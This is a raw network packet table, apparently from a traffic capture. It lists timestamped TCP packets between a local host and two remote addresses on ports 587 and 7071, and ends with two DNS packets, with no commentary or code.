Nov 26, 2024 09:02:04.855834961 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.855853081 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.855899096 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.856091976 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.856153965 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.856280088 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.856375933 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.856745005 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.856787920 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.856790066 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.856823921 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.856849909 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.856887102 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.856898069 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.856931925 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.856973886 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.857008934 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.857076883 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.857111931 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.857167959 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.857207060 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.857335091 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.857414961 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.857454062 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.857455015 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.857469082 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.857533932 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.857568026 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.857594967 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.857624054 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.857637882 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.857672930 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.857748032 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.857765913 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.857867002 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.857943058 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.858000994 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.858136892 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.858145952 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.858184099 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.858196974 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.858196974 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.858223915 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.858277082 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.858299017 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.858316898 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.858349085 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.858361006 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.858395100 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.858428001 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.858464956 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.858501911 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.858536959 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.858547926 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.858584881 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.858597040 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.858731985 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.858738899 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.858756065 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.858792067 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.858792067 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.858819962 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.858889103 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.858937979 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.858938932 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.858958006 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.859005928 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.859036922 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.859036922 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.859066010 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.859107018 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.859131098 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.859174013 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.859190941 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.859236002 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.859255075 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.859273911 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.859323978 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.859364986 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.859394073 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.859445095 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.859464884 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.859528065 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.859574080 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.859574080 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.859601974 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.859647989 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.859682083 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.859682083 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.859709978 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.859776020 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.859802008 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.859821081 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.859853983 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.859889030 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.859950066 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.859992027 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.860023022 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.860037088 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.860061884 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.860078096 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.860105038 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.860150099 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.860186100 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.860186100 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.860238075 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.860321045 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.860353947 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.860353947 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.860419035 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.860428095 CET	587	49809	51.195.88.199	192.168.2.5
Nov 26, 2024 09:02:04.860467911 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:04.860522032 CET	49809	587	192.168.2.5	51.195.88.199
Nov 26, 2024 09:02:31.932390928 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:02:32.052373886 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:02:32.054784060 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:02:32.216967106 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:02:32.337244987 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:02:42.796011925 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:02:42.915998936 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:02:43.171081066 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:02:43.187424898 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:02:43.307470083 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:02:53.384954929 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:02:53.504945993 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:02:54.023755074 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:02:54.032614946 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:02:54.153129101 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:03.950576067 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:04.073282957 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:13.214720964 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:13.262691975 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:14.528657913 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:14.648807049 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:15.312066078 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:15.329765081 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:15.449954033 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:15.512867928 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:15.514337063 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:15.634504080 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:25.106760979 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:25.226943970 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:26.044816971 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:26.051683903 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:26.171895981 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:30.731930971 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:30.778703928 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:35.684818983 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:35.804944038 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:35.981952906 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:36.102158070 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:36.310849905 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:36.433343887 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:38.544277906 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:38.664733887 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:44.997792959 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:45.121038914 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:45.121157885 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:45.244556904 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:45.247801065 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:45.370466948 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:49.266942978 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:49.270155907 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:49.449723005 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:49.677984953 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:49.681251049 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:49.802047968 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:49.826437950 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:49.830744028 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:49.992126942 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:50.003247976 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:50.005724907 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:50.125605106 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:50.127758026 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:50.247654915 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:51.575726986 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:51.696322918 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:52.395538092 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:52.397325039 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:52.517564058 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:58.233798981 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:58.353992939 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:58.781455040 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:03:58.783308983 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:03:58.903359890 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:00.809889078 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:00.929869890 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:00.929918051 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:01.050144911 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:01.050199032 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:01.172707081 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:05.875757933 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:05.995711088 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:11.737828970 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:11.778424025 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:12.024878979 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:12.031763077 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:12.151763916 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:12.225835085 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:12.231790066 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:12.351849079 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:12.352946997 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:12.354492903 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:12.516197920 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:12.516244888 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:12.636094093 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:16.492482901 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:16.612485886 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:16.981869936 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:17.101838112 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:17.101927996 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:17.222007990 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:17.222057104 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:17.342000961 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:17.346144915 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:17.466778994 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:17.911207914 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:17.913650036 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:18.033665895 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:19.187123060 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:19.188935041 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:19.309032917 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:22.262979984 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:22.382916927 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:22.403686047 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:22.523745060 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:22.523796082 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:22.643881083 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:23.871028900 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:23.873177052 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:23.993257046 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:24.634902954 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:24.636971951 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:24.757549047 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:27.867579937 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:27.921185970 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:27.926086903 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:28.047266960 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:28.917831898 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:28.920245886 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:29.043072939 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:29.119827986 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:29.121465921 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:29.243823051 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:31.067387104 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:31.069350004 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:31.189547062 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:33.017507076 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:33.137558937 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:33.466103077 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:33.586441994 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:33.591379881 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:33.711642981 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:39.997586012 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:40.118187904 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:41.341121912 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:41.462721109 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:41.687802076 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:41.807820082 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:49.185216904 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:49.305366039 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:49.305464029 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:49.425715923 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:49.669878006 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:49.790528059 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:51.862258911 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:51.903353930 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:52.062572956 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:52.064244032 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:52.184293985 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:52.263776064 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:52.265187979 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:52.385308027 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:52.385459900 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:52.385516882 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:52.434588909 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:52.464669943 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:52.464744091 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:52.548782110 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:52.548850060 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:52.584731102 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:52.669262886 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:53.356699944 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:53.477915049 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:53.951354980 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:54.071283102 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:54.701215982 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:54.905164957 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:54.905220032 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:55.025293112 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:55.286762953 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:55.288261890 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:55.408250093 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:55.486651897 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:55.488178968 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:55.608175039 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:55.609364986 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:55.611299038 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:55.687750101 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:55.731477022 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:55.776117086 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:55.778033018 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:55.898030043 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:58.094070911 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:58.214073896 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:04:58.497441053 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:04:58.617494106 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:05:00.263200045 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:05:00.384222984 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:05:04.919414043 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:05:05.039475918 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:05:06.138209105 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:05:06.258234024 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:05:09.499036074 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:05:09.547852039 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:05:09.700077057 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:05:09.701989889 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:05:09.822257996 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:05:09.901030064 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:05:09.903577089 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:05:10.023732901 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:05:10.027329922 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:05:10.147521019 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:05:15.843877077 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:05:15.964296103 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:05:16.213174105 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:05:16.214896917 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:05:16.335200071 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:05:23.716324091 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:05:23.836381912 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:05:24.089816093 CET	7071	49829	212.162.149.53	192.168.2.5
Nov 26, 2024 09:05:24.090868950 CET	49829	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:05:24.210798025 CET	7071	49829	212.162.149.53	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2024 09:01:24.460860968 CET	54652	53	192.168.2.5	1.1.1.1
Nov 26, 2024 09:01:24.605420113 CET	53	54652	1.1.1.1	192.168.2.5
